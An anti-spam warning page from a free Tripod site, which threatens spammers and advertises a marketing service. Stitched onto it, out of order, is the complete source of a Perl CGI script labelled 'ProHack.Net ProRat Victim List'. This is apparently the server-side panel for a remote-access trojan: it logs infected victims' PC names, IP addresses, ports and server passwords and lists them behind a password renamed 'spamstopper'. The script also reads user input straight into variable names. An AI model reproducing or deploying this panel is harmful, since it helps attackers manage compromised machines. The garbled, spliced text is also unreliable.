Make your own free website on Tripod.com
Warning! | Contact us | Judgments | Page Title | Page Title

Warning!

 

Your contact has been logged.

     You have been directed to this website because the email you sent me originated from Spam.  Your offer or advertisement was sent to me for no apparent reason.  It's nice that you are attempting to further your business and gain financial progress, but have you ever considered doing it legally rather than illegally through Spam leads?  At this time your IP address, your email address, and your ISP provider have been documented in addition to any other contact information that was included in your email.  You may want to visit http://www.mcnichol.com/spam.htm to see what charges, fines, fees, suits, and jail time you could be faced with.  You don't have to be an attorney to understand that what you are involved with is not worth the risk.

 

The same way that spammers sell and resell leads to hide their location and identity, the victim can also take extra measures to stop it.  If you think your company or resources are 100% legit, YOU ARE WRONG.  The worst part is that you paid them.

This is also why spammers can make $750,000 a month, because you believe them and buy their leads.  You were ripped off.  The main reason why people Spam or purchase Spam leads is either because they don't have a website or their website sucks and it doesn't bring them the customers they are looking for.  Legitimate, effective traffic can cost thousands of dollars and is often just not worth it.  This doesn't have to be the case, there are companies that offer affordable, safe means for bringing you customers.  Contact us today for smarter ways to reach people and you'll be amazed at how much easier it is to reach potential customers. 

 

Cease any further contact.

Your contact may actually be related to our response from an email that was actually Spam.  In other words, we may have gone as far as filling out a form originating from Spam to end up with your contact.  As you can see, you haven't reached a person, so your Spam is ineffective.  If you are an independent business paying for leads, then you were ripped off.  DON'T PAY FOR LEADS.  Your chances of getting a solid, promising lead from the Internet through Spam is much less than going door to door for business.  Spam sucks and nobody likes it.

 

 

 

If you believe that the company generating your leads is legitimate, ask them how they originally contacted us.  If they say that a form was filled out online, then ask them how we got that form to begin with. So far, no one who has sold our email address can explain how they originally acquired our information.  This tells you that you are purchasing, promoting, and utilizing Spam.  You can also have legal repercussions from this as well, you and your company can be sued for a minimum of $500 per occurrence.  This does not include your cost to come to our state and fight it in court.

Dont be caught in court without answers, contact us for effective marketing.

\n"; open(DOSYA,">>$log_file"); print DOSYA $mono; close(DOSYA); print "Location: $script_name?islem=giris&pass=$pass\n\n"; } sub temizle { open(DOSYA,">$log_file"); print DOSYA $mono; close(DOSYA); print "Location: $script_name?islem=giris&pass=$pass\n\n"; } # ProHack.Net Profesyonel Internet !!!

.

#!/usr/bin/perl ################################################################################################# # # # soMMMMo MMMMMMo MMMMMMo oMMs MMsssss # # MMMMMMMMM MMMMMMMMs oMMMMo MMMMMMMMs MMMM MMMMMMMMMMM # # MMMMs oMo oMMMMMMMo sMMMMMMMs oMMMMMMMo MMMMs MMMMMMMMMMM # # oMMs MM soMMs oMM sMMMs oMMs soMMs oMM MMMMo MMooMMos # # sMMo sMM sMMs MM oMMs MMM sMMs MM sMMoMM MMo # # sMM oMo sMMs sMM MMM oMMo sMMs sMM sMMsMMs MMo # # MMs oMMs oMMooMMo MMM sMMM oMMooMMo oMM MMM MMo # # MMMMMMo oMMMMMM MMM sMMM oMMMMMM oMM oMMs MMo # # MMMMMs oMMMMMs MMMs MMM oMMMMMs oMM oMMo oMo # # MMM oMMMMMs MMMs MMM oMMMMMs sMMMMMMMM oMo # # oMM oMMMMMM oMMo MMM oMMMMMM MMMMMMMMMs oMM # # oMMs oMMoMMMo sMMo MMo oMMoMMMo MMMo oMMM oMM # # oMMo oMMooMMMMs MMM sMMs oMMooMMMMs sMMo sMMMs oMM # # oMMM oMMo oMMM oMMo sMMM oMMo oMMM sMMo MMMo oMM # # oMMMs oMMo sMs oMMMMMMs oMMo sMs oMMo MMMo oMM # # soMMo MMMo oMMMo MMMo oMMo oos soMs # # # ################################################################################################# # ABOUT # ################################################################################################# # ProHack.Net ProRat Victim List # # Web : http://www.prorat.net # # Web : http://www.prohack.net # # Web : http://www.prohack.org # # Web : http://www.proprogram.net # # Email : admin@prohack.net # # Coded by : PRO Group # ################################################################################################# # LANGUAGE # ################################################################################################# $lang1 = "Cant be found!"; $lang2 = "ProHack.Net ProRat Victim List (-Please enter you password again-)"; $lang3 = "Wrong Password. Please check your password!"; $lang4 = "OKEY"; $lang5 = "ProHack.Net ProRat Victim List (-Enter Your Password-)"; $lang6 = "Please Enter Your Password:"; $lang7 = "ProHack.Net ProRat Victim List"; $lang8 = "PROHACK.NET PRORAT VICTIM LÝST"; $lang9 = "CGI TEST :"; $lang10 = "TEST"; $lang11 = "JANUARY"; $lang12 = "FEBRUARY"; $lang13 = "MARCH"; $lang14 = "APRIL"; $lang15 = "MAY"; $lang16 = "JUNE"; $lang17 = "JULY"; $lang18 = "AUGUST"; $lang19 = "SEPTEMBER"; $lang20 = "OCTOBER"; $lang21 = "NOVEMBER"; $lang22 = "DECEMBER"; $lang23 = "SUNDAY"; $lang24 = "MONDAY"; $lang25 = "TUESDAY"; $lang26 = "WEDNESDAY"; $lang27 = "THURSDAY"; $lang28 = "FRIDAY"; $lang29 = "SATURDAY"; $lang30 = "DATE:"; $lang31 = "TIME:"; $lang32 = "REFRESH PAGE"; $lang33 = "DELETE RECORDS"; $lang34 = "PC NAME"; $lang35 = "IP ADDRESS"; $lang36 = "PORT"; $lang37 = "VICTIM"; $lang38 = "SERVER"; $lang39 = "TIME"; $lang40 = "DATE"; $lang41 = "PASSWORD"; $lang42 = "windows-1252"; ################################################################################################# read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'}); @ciftler = split(/&/, $buffer); foreach $cift (@ciftler) { ($isim, $deger) = split(/=/, $cift); $deger =~ s/(%0D)+//ig; $deger =~ tr/+/ /; $deger=~ s/%(..)/pack("c",hex($1))/ge; $deger =~ s/\n/
/g; ${$isim} = $deger; } @degerler=split(/&/,$ENV{'QUERY_STRING'}); foreach $i (@degerler) { ($alanadi,$deger)=split(/=/,$i); $deger=~ tr/+/ /; $deger=~ s/%(..)/pack("c",hex($1))/ge; $deger =~ s/\n/
/g; ${$alanadi}=$deger; } ################################################################################################# # SETTINGS # ################################################################################################# $script_name = "spamstopper.cgi"; $log_file = "log.dat"; $password = "spamstopper"; $show_list = "100"; ################################################################################################# open (FILE,"+<$log_file") || die "$log_file $lang1\n"; @list = ; close(FILE); @list=reverse(@list); while ($#list >= $show_list) { pop @list; } if ($islem eq "log"){&log;exit;} if (($islem eq "temizle")&&($pass eq $password)){&temizle;exit;} if ($password eq ""){&sayfa;} if ($islem eq ""){&pass;exit;} if (($islem eq "giris")&&($pass eq $password)){&sayfa;exit;}&hatali;exit; sub hatali { print "Content-type:text/html\n\n"; print "\n"; print "\n"; print "$lang2\n"; print "\n"; print "



\n"; print "
\n"; print "
\n"; print "$lang3

\n"; print "
\n"; print "\n"; print "\n"; print "\n"; print "

\n"; print "
\n"; print "\n"; exit; } sub pass { print "Content-type:text/html\n\n"; print "\n"; print "\n"; print "$lang5\n"; print "\n"; print "



\n"; print "
\n"; print "
\n"; print "$lang6

\n"; print "
\n"; print "\n"; print "\n"; print "\n"; print "

\n"; print "
\n"; print "\n"; exit; } sub sayfa { print "Content-type:text/html\n\n"; print "\n"; print "\n"; print "$lang7\n"; print "

\n"; print "=$lang8=\n"; print "\n"; print "
\n"; print "

$lang9\n"; print "\n"; print "  \n"; print "  \n"; print "  \n"; print "  \n"; print "  \n"; print "  \n"; print "  \n"; print " \n"; print "

\n"; print "\n"; print "
\n"; print "
\n"; print "\n"; print "
\n"; print "$lang32\n"; print "\n"; print "$lang33
\n"; print "\n"; print "\n"; print "\n"; print "\n"; print "\n"; print "\n"; print "\n"; print "\n"; print "@list\n"; print "
 $lang34 
 $lang35 
 $lang36 
 $lang37 
 $lang38 
 $lang39 
 $lang40 
 $lang41 
\n"; exit; } sub log { $mono = "
".$bilgisayaradi."".$ipadresi."".$serverportu."".$kurban."".$servermodeli."".$serversaati."".$servertarihi."".$serversifre."